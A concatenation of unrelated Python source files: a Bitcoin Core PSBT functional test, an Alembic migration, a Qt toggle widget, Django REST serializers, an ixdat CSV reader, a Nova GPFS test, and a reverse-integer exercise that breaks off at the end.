self.nodes[1].getnewaddress("", "bech32") p2pkh = self.nodes[1].getnewaddress("", "legacy") p2sh_p2wpkh = self.nodes[1].getnewaddress("", "p2sh-segwit") # fund those addresses rawtx = self.nodes[0].createrawtransaction([], {p2sh:10, p2wsh:10, p2wpkh:10, p2sh_p2wsh:10, p2sh_p2wpkh:10, p2pkh:10}) rawtx = self.nodes[0].fundrawtransaction(rawtx, {"changePosition":3}) signed_tx = self.nodes[0].signrawtransactionwithwallet(rawtx['hex'])['hex'] txid = self.nodes[0].sendrawtransaction(signed_tx) self.nodes[0].generate(6) self.sync_all() # Find the output pos p2sh_pos = -1 p2wsh_pos = -1 p2wpkh_pos = -1 p2pkh_pos = -1 p2sh_p2wsh_pos = -1 p2sh_p2wpkh_pos = -1 decoded = self.nodes[0].decoderawtransaction(signed_tx) for out in decoded['vout']: if out['scriptPubKey']['addresses'][0] == p2sh: p2sh_pos = out['n'] elif out['scriptPubKey']['addresses'][0] == p2wsh: p2wsh_pos = out['n'] elif out['scriptPubKey']['addresses'][0] == p2wpkh: p2wpkh_pos = out['n'] elif out['scriptPubKey']['addresses'][0] == p2sh_p2wsh: p2sh_p2wsh_pos = out['n'] elif out['scriptPubKey']['addresses'][0] == p2sh_p2wpkh: p2sh_p2wpkh_pos = out['n'] elif out['scriptPubKey']['addresses'][0] == p2pkh: p2pkh_pos = out['n'] # spend single key from node 1 rawtx = self.nodes[1].walletcreatefundedpsbt([{"txid":txid,"vout":p2wpkh_pos},{"txid":txid,"vout":p2sh_p2wpkh_pos},{"txid":txid,"vout":p2pkh_pos}], {self.nodes[1].getnewaddress():29.99})['psbt'] walletprocesspsbt_out = self.nodes[1].walletprocesspsbt(rawtx) assert_equal(walletprocesspsbt_out['complete'], True) self.nodes[1].sendrawtransaction(self.nodes[1].finalizepsbt(walletprocesspsbt_out['psbt'])['hex']) # partially sign multisig things with node 1 psbtx = self.nodes[1].walletcreatefundedpsbt([{"txid":txid,"vout":p2wsh_pos},{"txid":txid,"vout":p2sh_pos},{"txid":txid,"vout":p2sh_p2wsh_pos}], {self.nodes[1].getnewaddress():29.99})['psbt'] walletprocesspsbt_out = self.nodes[1].walletprocesspsbt(psbtx) psbtx = walletprocesspsbt_out['psbt'] assert_equal(walletprocesspsbt_out['complete'], False) # partially sign with node 2. 
This should be complete and sendable walletprocesspsbt_out = self.nodes[2].walletprocesspsbt(psbtx) assert_equal(walletprocesspsbt_out['complete'], True) self.nodes[2].sendrawtransaction(self.nodes[2].finalizepsbt(walletprocesspsbt_out['psbt'])['hex']) # check that walletprocesspsbt fails to decode a non-psbt rawtx = self.nodes[1].createrawtransaction([{"txid":txid,"vout":p2wpkh_pos}], {self.nodes[1].getnewaddress():9.99}) assert_raises_rpc_error(-22, "TX decode failed", self.nodes[1].walletprocesspsbt, rawtx) # Convert a non-psbt to psbt and make sure we can decode it rawtx = self.nodes[0].createrawtransaction([], {self.nodes[1].getnewaddress():10}) rawtx = self.nodes[0].fundrawtransaction(rawtx) new_psbt = self.nodes[0].converttopsbt(rawtx['hex']) self.nodes[0].decodepsbt(new_psbt) # Make sure that a psbt with signatures cannot be converted signedtx = self.nodes[0].signrawtransactionwithwallet(rawtx['hex']) assert_raises_rpc_error(-22, "TX decode failed", self.nodes[0].converttopsbt, signedtx['hex']) assert_raises_rpc_error(-22, "TX decode failed", self.nodes[0].converttopsbt, signedtx['hex'], False) # Unless we allow it to convert and strip signatures self.nodes[0].converttopsbt(signedtx['hex'], True) # Explicitly allow converting non-empty txs new_psbt = self.nodes[0].converttopsbt(rawtx['hex']) self.nodes[0].decodepsbt(new_psbt) # Create outputs to nodes 1 and 2 node1_addr = self.nodes[1].getnewaddress() node2_addr = self.nodes[2].getnewaddress() txid1 = self.nodes[0].sendtoaddress(node1_addr, 13) txid2 =self.nodes[0].sendtoaddress(node2_addr, 13) self.nodes[0].generate(6) self.sync_all() vout1 = find_output(self.nodes[1], txid1, 13) vout2 = find_output(self.nodes[2], txid2, 13) # Create a psbt spending outputs from nodes 1 and 2 psbt_orig = self.nodes[0].createpsbt([{"txid":txid1, "vout":vout1}, {"txid":txid2, "vout":vout2}], {self.nodes[0].getnewaddress():25.999}) # Update psbts, should only have data for one input and not the other psbt1 = self.nodes[1].walletprocesspsbt(psbt_orig)['psbt'] psbt1_decoded = self.nodes[0].decodepsbt(psbt1) assert psbt1_decoded['inputs'][0] and not psbt1_decoded['inputs'][1] psbt2 = self.nodes[2].walletprocesspsbt(psbt_orig)['psbt'] psbt2_decoded = self.nodes[0].decodepsbt(psbt2) assert not psbt2_decoded['inputs'][0] and psbt2_decoded['inputs'][1] # Combine, finalize, and send the psbts combined = self.nodes[0].combinepsbt([psbt1, psbt2]) finalized = self.nodes[0].finalizepsbt(combined)['hex'] self.nodes[0].sendrawtransaction(finalized) self.nodes[0].generate(6) self.sync_all() # Test additional args in walletcreatepsbt # Make sure both pre-included and funded inputs # have the correct sequence numbers based on # replaceable arg block_height = self.nodes[0].getblockcount() unspent = self.nodes[0].listunspent()[0] psbtx_info = self.nodes[0].walletcreatefundedpsbt([{"txid":unspent["txid"], "vout":unspent["vout"]}], [{self.nodes[2].getnewaddress():unspent["amount"]+1}], block_height+2, {"replaceable":True}, False) decoded_psbt = self.nodes[0].decodepsbt(psbtx_info["psbt"]) for tx_in, psbt_in in zip(decoded_psbt["tx"]["vin"], decoded_psbt["inputs"]): assert_equal(tx_in["sequence"], MAX_BIP125_RBF_SEQUENCE) assert "bip32_derivs" not in psbt_in assert_equal(decoded_psbt["tx"]["locktime"], block_height+2) # Same construction with only locktime set psbtx_info = self.nodes[0].walletcreatefundedpsbt([{"txid":unspent["txid"], "vout":unspent["vout"]}], [{self.nodes[2].getnewaddress():unspent["amount"]+1}], block_height, {}, True) decoded_psbt = 
self.nodes[0].decodepsbt(psbtx_info["psbt"]) for tx_in, psbt_in in zip(decoded_psbt["tx"]["vin"], decoded_psbt["inputs"]): assert tx_in["sequence"] > MAX_BIP125_RBF_SEQUENCE assert "bip32_derivs" in psbt_in assert_equal(decoded_psbt["tx"]["locktime"], block_height) # Same construction without optional arguments psbtx_info = self.nodes[0].walletcreatefundedpsbt([{"txid":unspent["txid"], "vout":unspent["vout"]}], [{self.nodes[2].getnewaddress():unspent["amount"]+1}]) decoded_psbt = self.nodes[0].decodepsbt(psbtx_info["psbt"]) for tx_in in decoded_psbt["tx"]["vin"]: assert tx_in["sequence"] > MAX_BIP125_RBF_SEQUENCE assert_equal(decoded_psbt["tx"]["locktime"], 0) # Regression test for 14473 (mishandling of already-signed witness transaction): psbtx_info = self.nodes[0].walletcreatefundedpsbt([{"txid":unspent["txid"], "vout":unspent["vout"]}], [{self.nodes[2].getnewaddress():unspent["amount"]+1}]) complete_psbt = self.nodes[0].walletprocesspsbt(psbtx_info["psbt"]) double_processed_psbt = self.nodes[0].walletprocesspsbt(complete_psbt["psbt"]) assert_equal(complete_psbt, double_processed_psbt) # We don't care about the decode result, but decoding must succeed. self.nodes[0].decodepsbt(double_processed_psbt["psbt"]) # BIP 174 Test Vectors # Check that unknown values are just passed through unknown_psbt = "cHNidP8BAD8CAAAAAf//////////////////////////////////////////AAAAAAD/////AQAAAAAAAAAAA2oBAAAAAAAACg8BAgMEBQYHCAkPAQIDBAUGBwgJCgsMDQ4PAAA=" unknown_out = self.nodes[0].walletprocesspsbt(unknown_psbt)['psbt'] assert_equal(unknown_psbt, unknown_out) # Open the data file with open(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data/rpc_psbt.json'), encoding='utf-8') as f: d = json.load(f) invalids = d['invalid'] valids = d['valid'] creators = d['creator'] signers = d['signer'] combiners = d['combiner'] finalizers = d['finalizer'] extractors = d['extractor'] # Invalid PSBTs for invalid in invalids: assert_raises_rpc_error(-22, "TX decode failed", self.nodes[0].decodepsbt, invalid) # Valid PSBTs for valid in valids: self.nodes[0].decodepsbt(valid) # Creator Tests for creator in creators: created_tx = self.nodes[0].createpsbt(creator['inputs'], creator['outputs']) assert_equal(created_tx, creator['result']) # Signer tests for i, signer in enumerate(signers): self.nodes[2].createwallet("wallet{}".format(i)) wrpc = self.nodes[2].get_wallet_rpc("wallet{}".format(i)) for key in signer['privkeys']: wrpc.importprivkey(key) signed_tx = wrpc.walletprocesspsbt(signer['psbt'])['psbt'] assert_equal(signed_tx, signer['result']) # Combiner test for combiner in combiners: combined = self.nodes[2].combinepsbt(combiner['combine']) assert_equal(combined, combiner['result']) # Finalizer test for finalizer in finalizers: finalized = self.nodes[2].finalizepsbt(finalizer['finalize'], False)['psbt'] assert_equal(finalized, finalizer['result']) # Extractor test for extractor in extractors: extracted = self.nodes[2].finalizepsbt(extractor['extract'], True)['hex'] assert_equal(extracted, extractor['result']) # Unload extra wallets for i, signer in enumerate(signers): self.nodes[2].unloadwallet("wallet{}".format(i)) self.test_utxo_conversion() # Test that psbts with p2pkh outputs are created properly p2pkh = self.nodes[0].getnewaddress(address_type='legacy') psbt = self.nodes[1].walletcreatefundedpsbt([], [{p2pkh : 1}], 0, {"includeWatching" : True}, True) self.nodes[0].decodepsbt(psbt['psbt']) if __name__ == '__main__': PSBTTest().main()
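

# Usage sketch: the minimal multi-party PSBT round trip exercised above,
# condensed into one helper. `node_a` and `node_b` stand for RPC wrappers
# like self.nodes[i]; only RPCs already used in this test appear here.
def psbt_round_trip(node_a, node_b, inputs, outputs):
    psbt = node_a.createpsbt(inputs, outputs)         # unsigned skeleton
    part_a = node_a.walletprocesspsbt(psbt)['psbt']   # node A adds what it can
    part_b = node_b.walletprocesspsbt(psbt)['psbt']   # node B adds what it can
    combined = node_a.combinepsbt([part_a, part_b])   # merge the partial PSBTs
    final = node_a.finalizepsbt(combined)             # extract a network tx
    assert final['complete']
    return node_a.sendrawtransaction(final['hex'])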
the-stack_106_24348
# Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ create role invitation table Revision ID: 80018e46c5a4 Revises: 87509f4ae027 Create Date: 2020-06-28 14:53:07.803972 """ import sqlalchemy as sa from alembic import op from sqlalchemy.dialects import postgresql revision = "80018e46c5a4" down_revision = "87509f4ae027" def upgrade(): op.create_table( "role_invitations", sa.Column( "id", postgresql.UUID(as_uuid=True), server_default=sa.text("gen_random_uuid()"), nullable=False, ), sa.Column("invite_status", sa.Text(), nullable=False), sa.Column("token", sa.Text(), nullable=False), sa.Column("user_id", postgresql.UUID(as_uuid=True), nullable=False), sa.Column("project_id", postgresql.UUID(as_uuid=True), nullable=False), sa.ForeignKeyConstraint( ["project_id"], ["projects.id"], onupdate="CASCADE", ondelete="CASCADE" ), sa.ForeignKeyConstraint( ["user_id"], ["users.id"], onupdate="CASCADE", ondelete="CASCADE" ), sa.PrimaryKeyConstraint("id"), sa.UniqueConstraint( "user_id", "project_id", name="_role_invitations_user_project_uc" ), ) op.create_index( "role_invitations_user_id_idx", "role_invitations", ["user_id"], unique=False ) def downgrade(): op.drop_index("role_invitations_user_id_idx", table_name="role_invitations") op.drop_table("role_invitations")
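

# Usage sketch, assuming an "alembic.ini" at the project root (most projects
# drive this through the `alembic` CLI rather than running the file directly):
if __name__ == "__main__":
    from alembic import command
    from alembic.config import Config

    cfg = Config("alembic.ini")              # assumed config location
    command.upgrade(cfg, revision)           # apply upgrade() above
    # command.downgrade(cfg, down_revision)  # revert to the previous revision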
the-stack_106_24350
import sys if 'PyQt5' in sys.modules: from PyQt5.QtCore import ( Qt, QSize, QPoint, QPointF, QRectF, QEasingCurve, QPropertyAnimation, QSequentialAnimationGroup, pyqtSlot, pyqtProperty) from PyQt5.QtWidgets import QCheckBox from PyQt5.QtGui import QColor, QBrush, QPaintEvent, QPen, QPainter from PyQt5.QtCore import pyqtSlot as Slot, pyqtProperty as Property elif 'PySide2' in sys.modules: from PySide2.QtCore import ( Qt, QSize, QPoint, QPointF, QRectF, QEasingCurve, QPropertyAnimation, QSequentialAnimationGroup, Slot, Property) from PySide2.QtWidgets import QCheckBox from PySide2.QtGui import QColor, QBrush, QPaintEvent, QPen, QPainter else: from PySide6.QtCore import ( Qt, QSize, QPoint, QPointF, QRectF, QEasingCurve, QPropertyAnimation, QSequentialAnimationGroup, Slot, Property) from PySide6.QtWidgets import QCheckBox from PySide6.QtGui import QColor, QBrush, QPaintEvent, QPen, QPainter class Toggle(QCheckBox): _transparent_pen = QPen(Qt.transparent) _light_grey_pen = QPen(Qt.lightGray) def __init__(self, parent=None, bar_color=Qt.gray, checked_color="#00B0FF", handle_color=Qt.white, ): super().__init__(parent) # Save our properties on the object via self, so we can access them later # in the paintEvent. self._bar_brush = QBrush(bar_color) self._bar_checked_brush = QBrush(QColor(checked_color).lighter()) self._handle_brush = QBrush(handle_color) self._handle_checked_brush = QBrush(QColor(checked_color)) # Setup the rest of the widget. self.setContentsMargins(8, 0, 8, 0) self._handle_position = 0 self.stateChanged.connect(self.handle_state_change) def sizeHint(self): return QSize(58, 45) def hitButton(self, pos: QPoint): return self.contentsRect().contains(pos) def paintEvent(self, e: QPaintEvent): contRect = self.contentsRect() handleRadius = round(0.24 * contRect.height()) p = QPainter(self) p.setRenderHint(QPainter.Antialiasing) p.setPen(self._transparent_pen) barRect = QRectF( 0, 0, contRect.width() - handleRadius, 0.40 * contRect.height() ) barRect.moveCenter(contRect.center()) rounding = barRect.height() / 2 # the handle will move along this line trailLength = contRect.width() - 2 * handleRadius xPos = contRect.x() + handleRadius + trailLength * self._handle_position if self.isChecked(): p.setBrush(self._bar_checked_brush) p.drawRoundedRect(barRect, rounding, rounding) p.setBrush(self._handle_checked_brush) else: p.setBrush(self._bar_brush) p.drawRoundedRect(barRect, rounding, rounding) p.setPen(self._light_grey_pen) p.setBrush(self._handle_brush) p.drawEllipse( QPointF(xPos, barRect.center().y()), handleRadius, handleRadius) p.end() @Slot(int) def handle_state_change(self, value): self._handle_position = 1 if value else 0 @Property(float) def handle_position(self): return self._handle_position @handle_position.setter def handle_position(self, pos): """change the property we need to trigger QWidget.update() method, either by: 1- calling it here [ what we're doing ]. 2- connecting the QPropertyAnimation.valueChanged() signal to it. 
""" self._handle_position = pos self.update() @Property(float) def pulse_radius(self): return self._pulse_radius @pulse_radius.setter def pulse_radius(self, pos): self._pulse_radius = pos self.update() class AnimatedToggle(Toggle): _transparent_pen = QPen(Qt.transparent) _light_grey_pen = QPen(Qt.lightGray) def __init__(self, *args, pulse_unchecked_color="#44999999", pulse_checked_color="#4400B0EE", **kwargs): self._pulse_radius = 0 super().__init__(*args, **kwargs) self.animation = QPropertyAnimation(self, b"handle_position", self) self.animation.setEasingCurve(QEasingCurve.InOutCubic) self.animation.setDuration(200) # time in ms self.pulse_anim = QPropertyAnimation(self, b"pulse_radius", self) self.pulse_anim.setDuration(350) # time in ms self.pulse_anim.setStartValue(10) self.pulse_anim.setEndValue(20) self.animations_group = QSequentialAnimationGroup() self.animations_group.addAnimation(self.animation) self.animations_group.addAnimation(self.pulse_anim) self._pulse_unchecked_animation = QBrush(QColor(pulse_unchecked_color)) self._pulse_checked_animation = QBrush(QColor(pulse_checked_color)) @Slot(int) def handle_state_change(self, value): self.animations_group.stop() if value: self.animation.setEndValue(1) else: self.animation.setEndValue(0) self.animations_group.start() def paintEvent(self, e: QPaintEvent): contRect = self.contentsRect() handleRadius = round(0.24 * contRect.height()) p = QPainter(self) p.setRenderHint(QPainter.Antialiasing) p.setPen(self._transparent_pen) barRect = QRectF( 0, 0, contRect.width() - handleRadius, 0.40 * contRect.height() ) barRect.moveCenter(contRect.center()) rounding = barRect.height() / 2 # the handle will move along this line trailLength = contRect.width() - 2 * handleRadius xPos = contRect.x() + handleRadius + trailLength * self._handle_position if self.pulse_anim.state() == QPropertyAnimation.Running: p.setBrush( self._pulse_checked_animation if self.isChecked() else self._pulse_unchecked_animation) p.drawEllipse(QPointF(xPos, barRect.center().y()), self._pulse_radius, self._pulse_radius) if self.isChecked(): p.setBrush(self._bar_checked_brush) p.drawRoundedRect(barRect, rounding, rounding) p.setBrush(self._handle_checked_brush) else: p.setBrush(self._bar_brush) p.drawRoundedRect(barRect, rounding, rounding) p.setPen(self._light_grey_pen) p.setBrush(self._handle_brush) p.drawEllipse( QPointF(xPos, barRect.center().y()), handleRadius, handleRadius) p.end()
the-stack_106_24352
# -*- coding: utf-8 -*- from rest_framework import serializers from rest_framework.reverse import NoReverseMatch, reverse from tandlr.core.api.serializers import ModelSerializer from tandlr.users.serializers import UserSerializer from .models import Notification class NotificationTargetSerializer(serializers.Serializer): """ Custom serializer for the 'target' attribute of the ```tandlr.notifications.models.Notification``` model. """ id = serializers.IntegerField(source='target_id') type = serializers.CharField(source='target._meta.model_name') action = serializers.CharField(source='target_action') resource_uri = serializers.SerializerMethodField() def get_action(self, obj): return 'created' def get_resource_uri(self, obj): """ Tries to return the resource uri for the given object if a proper viewset is registered in the API. Otherwise returns None. """ url_name = 'api:v1:{0}-detail'.format(obj.target._meta.model_name) try: return reverse( url_name, args=[obj.target_id], request=self.context.get('request', None) ) except NoReverseMatch: return None class NotificationSerializer(ModelSerializer): """ Serializer class for the ```tandlr.notifications.models.Notification``` model. """ sender = serializers.SerializerMethodField() target = serializers.SerializerMethodField() class Meta: model = Notification fields = [ 'id', 'body', 'sender', 'target', 'was_delivered', 'is_read', 'created_date', 'last_modified' ] def get_sender(self, obj): """ Returns the notification's sender serialized with the minimal required fields. """ if obj.sender: serializer = UserSerializer( obj.sender, context=self.context, fields=[ 'id', 'username', 'email', 'name', 'last_name', 'second_last_name', 'photo' ] ) return serializer.data def get_target(self, obj): """ Returns the notification's target serialized with the minimal required fields. """ if obj.target: serializer = NotificationTargetSerializer( obj, context=self.context) return serializer.data class NotificationV2Serializer(ModelSerializer): """ Serializer class for the ```tandlr.notifications.models.Notification``` model. """ sender = serializers.SerializerMethodField() target = serializers.SerializerMethodField() class Meta: model = Notification fields = [ 'id', 'body', 'sender', 'target', 'was_delivered', 'is_read', 'created_date', 'last_modified' ] def get_sender(self, obj): """ Returns the notification's sender serialized with the minimal required fields. """ if obj.sender: serializer = UserSerializer( obj.sender, context=self.context, fields=[ 'id', 'username', 'email', 'name', 'last_name', 'second_last_name', 'photo', 'thumbnail' ] ) return serializer.data def get_target(self, obj): """ Returns the notification's target serialized with the minimal required fields. """ if obj.target: serializer = NotificationTargetSerializer( obj, context=self.context ) return serializer.data
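

# Usage sketch: serializing unread notifications from a DRF view. Passing the
# request in `context` is what lets NotificationTargetSerializer reverse a
# resource_uri; the `is_read` filter mirrors the field exposed above.
def serialize_unread_notifications(request):
    notifications = Notification.objects.filter(is_read=False)
    serializer = NotificationSerializer(
        notifications,
        many=True,
        context={'request': request},
    )
    return serializer.data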
the-stack_106_24353
"""Module defining the ixdat csv reader, so ixdat can read the files it exports.""" from pathlib import Path import numpy as np import re import pandas as pd from ..exceptions import ReadError from ..data_series import ValueSeries, TimeSeries, DataSeries, Field from ..measurements import Measurement from ..spectra import Spectrum, SpectrumSeries from ..techniques import TECHNIQUE_CLASSES regular_expressions = { "tstamp": r"tstamp = ([0-9\.]+)", "technique": r"technique = ([A-Za-z\-]+)\n", "N_header_lines": r"N_header_lines = ([0-9]+)", "backend_name": r"backend_name = (\w+)", "id": r"id = ([0-9]+)", "timecol": r"timecol '(.+)' for: (?:'(.+)')$", "unit": r"/ [(.+)]", "aux_file": r"'(.*)' in file: '(.*)'", } class IxdatCSVReader: """A class that reads the csv's made by ixdat.exporters.csv_exporter.CSVExporter read() is the important method - it takes the path to the mpt file as argument and returns an ECMeasurement object (ec_measurement) representing that file. The ECMeasurement contains a reference to the BiologicMPTReader object, as ec_measurement.reader. This makes available all the following stuff, likely useful for debugging. Attributes: path_to_file (Path): the location and name of the file read by the reader n_line (int): the number of the last line read by the reader place_in_file (str): The last location in the file read by the reader. This is used internally to tell the reader how to parse each line. Options are: "header", "column names", and "data". header_lines (list of str): a list of the header lines of the files. This includes the column name line. The header can be nicely viewed with the print_header() function. tstamp (str): The unix time corresponding to t=0 technique (str): The name of the technique N_header_lines (int): The number of lines in the header of the file column_names (list of str): The names of the data columns in the file column_data (dict of str: np.array): The data in the file as a dict. Note that the np arrays are the same ones as in the measurement's DataSeries, so this does not waste memory. file_has_been_read (bool): This is used to make sure read() is only successfully called once by the Reader. False until read() is called, then True. measurement (Measurement): The measurement returned by read() when the file is read. self.measureemnt is None before read() is called. """ delim = "," def __init__(self): """Initialize a Reader for ixdat-exported .csv files. See class docstring.""" self.name = None self.path_to_file = None self.n_line = 0 self.place_in_file = "header" self.header_lines = [] self.tstamp = None self.N_header_lines = None self.timecols = {} self.column_names = [] self.column_data = {} self.technique = None self.aux_series_list = [] self.measurement_class = Measurement self.file_has_been_read = False self.measurement = None def read(self, path_to_file, name=None, cls=None, **kwargs): """Return a Measurement with the data and metadata recorded in path_to_file This loops through the lines of the file, processing one at a time. For header lines, this involves searching for metadata. For the column name line, this involves creating empty arrays for each data series. For the data lines, this involves appending to these arrays. After going through all the lines, it converts the arrays to DataSeries. The technique is specified in the header, and used to pick the TechniqueMeasurement class. Finally, the method returns a TechniqueMeasurement object `measurement` with these DataSeries. 
All attributes of this reader can be accessed from the measurement as `measurement.reader.attribute_name`. Args: path_to_file (Path): The full abs or rel path including the ".mpt" extension name (str): The name of the measurement to return (defaults to path_to_file) cls (Measurement subclass): The class of measurement to return. By default, cls will be determined from the technique specified in the header of path_to_file. **kwargs (dict): Key-word arguments are passed to ECMeasurement.__init__ Returns cls: a Measurement of type cls """ path_to_file = Path(path_to_file) if path_to_file else self.path_to_file if self.file_has_been_read: print( f"This {self.__class__.__name__} has already read {self.path_to_file}." " Returning the measurement resulting from the original read. " "Use a new Reader if you want to read another file." ) return self.measurement self.name = name or path_to_file.name self.path_to_file = path_to_file with open(self.path_to_file, "r") as f: for line in f: self.process_line(line) for name in self.column_names: self.column_data[name] = np.array(self.column_data[name]) data_series_dict = {} for tcol_name in self.timecols: # then it's time! data_series_dict[tcol_name] = TimeSeries( name=tcol_name, unit_name=get_column_unit(tcol_name) or "s", data=self.column_data[tcol_name], tstamp=self.tstamp, ) for column_name, data in self.column_data.items(): if column_name in self.timecols: continue try: tcol_name = next( tcol_name for tcol_name in self.timecols if column_name in self.timecols[tcol_name] ) except StopIteration: # debugging raise ReadError( f"can't find tcol for {column_name}. timecols={self.timecols}" ) tseries = data_series_dict[tcol_name] vseries = ValueSeries( name=column_name, data=data, tseries=tseries, unit_name=get_column_unit(column_name), ) data_series_dict[column_name] = vseries data_series_list = list(data_series_dict.values()) + self.aux_series_list obj_as_dict = dict( name=self.name, technique=self.technique, reader=self, series_list=data_series_list, tstamp=self.tstamp, ) obj_as_dict.update(kwargs) if issubclass(cls, self.measurement_class): self.measurement_class = cls if issubclass(self.measurement_class, TECHNIQUE_CLASSES["EC"]): # this is how ECExporter exports current and potential: obj_as_dict["raw_potential_names"] = ("raw potential / [V]",) obj_as_dict["raw_current_names"] = ("raw current / [mA]",) self.measurement = self.measurement_class.from_dict(obj_as_dict) self.file_has_been_read = True return self.measurement def process_line(self, line): """Call the correct line processing method depending on self.place_in_file""" if self.place_in_file == "header": self.process_header_line(line) elif self.place_in_file == "column names": self.process_column_line(line) elif self.place_in_file == "data": self.process_data_line(line) else: # just for debugging raise ReadError(f"place_in_file = {self.place_in_file}") self.n_line += 1 def process_header_line(self, line): """Search line for important metadata and set the relevant attribute of self""" self.header_lines.append(line) N_head_match = re.search(regular_expressions["N_header_lines"], line) if N_head_match: self.N_header_lines = int(N_head_match.group(1)) return timestamp_match = re.search(regular_expressions["tstamp"], line) if timestamp_match: self.tstamp = float(timestamp_match.group(1)) return technique_match = re.search(regular_expressions["technique"], line) if technique_match: self.technique = technique_match.group(1) if self.technique in TECHNIQUE_CLASSES: if issubclass( 
TECHNIQUE_CLASSES[self.technique], self.measurement_class ): self.measurement_class = TECHNIQUE_CLASSES[self.technique] return timecol_match = re.search(regular_expressions["timecol"], line) if timecol_match: tcol = timecol_match.group(1) self.timecols[tcol] = [] for vcol in timecol_match.group(2).split("' and '"): self.timecols[tcol].append(vcol) aux_file_match = re.search(regular_expressions["aux_file"], line) if aux_file_match: aux_file_name = aux_file_match.group(1) aux_file = self.path_to_file.parent / aux_file_match.group(2) self.read_aux_file(aux_file, name=aux_file_name) if self.N_header_lines and self.n_line >= self.N_header_lines - 2: self.place_in_file = "column names" def process_column_line(self, line): """Split the line to get the names of the file's data columns""" self.header_lines.append(line) self.column_names = [name.strip() for name in line.split(self.delim)] self.column_data.update({name: [] for name in self.column_names}) self.place_in_file = "data" def process_data_line(self, line): """Split the line and append the numbers the corresponding data column arrays""" data_strings_from_line = line.strip().split(self.delim) for name, value_string in zip(self.column_names, data_strings_from_line): if value_string: try: value = float(value_string) except ValueError: # That is probably because different columns are different length. # so we just skip it! continue # raise ReadError(f"can't parse value string '{value_string}'") self.column_data[name].append(value) def read_aux_file(self, path_to_aux_file, name): """Read an auxiliary file and include its series list in the measurement""" spec = IxdatSpectrumReader().read(path_to_aux_file, name=name) self.aux_series_list += spec.series_list def print_header(self): """Print the file header including column names. read() must be called first.""" header = "".join(self.header_lines) print(header) def get_column_unit(column_name): """Return the unit name of an ixdat column, i.e the part of the name after the '/'""" unit_match = re.search(regular_expressions["unit"], column_name) if unit_match: unit_name = unit_match.group(1) else: unit_name = None return unit_name class IxdatSpectrumReader(IxdatCSVReader): """A reader for ixdat spectra.""" def read(self, path_to_file, name=None, cls=None, **kwargs): """Read an ixdat spectrum. This reads the header with the process_line() function inherited from IxdatCSVReader. Then it uses pandas to read the data. Args: path_to_file (Path): The full abs or rel path including the ".mpt" extension name (str): The name of the measurement to return (defaults to path_to_file) cls (Spectrum subclass): The class of measurement to return. By default, cls will be determined from the technique specified in the header of path_to_file. 
**kwargs (dict): Key-word arguments are passed to ECMeasurement.__init__ Returns cls: a Spectrum of type cls """ with open(path_to_file, "r") as f: for line in f: if self.place_in_file == "header": self.process_line(line) else: break df = pd.read_csv(path_to_file, sep=",", header=self.N_header_lines - 2) if self.technique == "spectrum": # FIXME: in the future, this needs to cover all spectrum classes x_name, y_name = tuple(df.keys()) x = df[x_name].to_numpy() y = df[y_name].to_numpy() cls = cls or Spectrum return cls.from_data( # see Spectrum.from_data() x, y, self.tstamp, x_name, y_name, name=self.name, technique=self.technique, reader=self, ) elif self.technique == "spectra": # FIXME: in the future, this needs to cover all spectrum series classes names = {} units = {} swap_axes = False for line in self.header_lines: for line_start in ("values", "first row", "first column"): if line.startswith(line_start): t_x_or_y = re.search("([yxt])=", line).group(1) names[t_x_or_y] = re.search(r"\'(.*)\'", line).group(1) units[t_x_or_y] = re.search(r"\[(.*)\]", line).group(1) if "row" in line_start and t_x_or_y == "t": # check! swap_axes = True z1 = np.array([float(key) for key in list(df.keys())[1:]]) z1_and_y = df.to_numpy() z0 = z1_and_y[:, 0] y = z1_and_y[:, 1:] if swap_axes: # This is the case if the file was export with spectra_as_rows = False. t = z1 x = z0 y = y.swapaxes(0, 1) else: t = z0 x = z1 tseries = TimeSeries( name=names["t"], unit_name=units["t"], data=t, tstamp=self.tstamp ) xseries = DataSeries(name=names["x"], unit_name=units["x"], data=x) field = Field( name=names["y"], unit_name=units["y"], data=y, axes_series=[tseries, xseries], ) cls = cls or SpectrumSeries return cls.from_field( # see SpectrumSeries.from_field() field, name=self.name, technique=self.technique, tstamp=self.tstamp )
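

# Usage sketch: reading back a file produced by ixdat's CSVExporter. The path
# is a placeholder; passing cls=Measurement keeps the reader's default class
# unless the file header names a more specific technique.
def load_exported_measurement(path="./exported_measurement.csv"):
    reader = IxdatCSVReader()
    measurement = reader.read(path, cls=Measurement)
    # everything parsed from the header stays reachable for debugging
    print(measurement.reader.technique, measurement.reader.tstamp)
    print(measurement.reader.column_names)
    return measurement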
the-stack_106_24354
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from nova.tests.unit.virt.libvirt.volume import test_volume from nova.virt.libvirt.volume import gpfs class LibvirtGPFSVolumeDriverTestCase(test_volume.LibvirtVolumeBaseTestCase): def test_libvirt_gpfs_driver_get_config(self): libvirt_driver = gpfs.LibvirtGPFSVolumeDriver(self.fake_conn) connection_info = { 'driver_volume_type': 'gpfs', 'data': { 'device_path': '/gpfs/foo', }, 'serial': 'fake_serial', } conf = libvirt_driver.get_config(connection_info, self.disk_info) tree = conf.format_dom() self.assertEqual('file', tree.get('type')) self.assertEqual('fake_serial', tree.find('./serial').text)
the-stack_106_24355
#! /usr/bin/env python
"""
Given a signed 32-bit integer x, return x with its digits reversed.
If reversing x causes the value to go outside the signed 32-bit integer
range [-2^31, 2^31 - 1], then return 0.
Assume the environment does not allow you to store 64-bit integers
(signed or unsigned).

Example 1:
Input: x = 123
Output: 321

Example 2:
Input: x = -123
Output: -321

Example 3:
Input: x = 120
Output: 21

Example 4:
Input: x = 0
Output: 0

Constraints:
-2^31 <= x <= 2^31 - 1
"""
import unittest


def reverse(x: int) -> int:
    """
    O(n) time and O(n) space as we reverse the integer string.
    """
    x_str = str(x)
    is_neg = x_str[0] == "-"
    rev_s = x_str[::-1]
    rev = -int(rev_s[:-1]) if is_neg else int(rev_s)
    if rev < -(2 ** 31) or rev > (2 ** 31 - 1):
        return 0
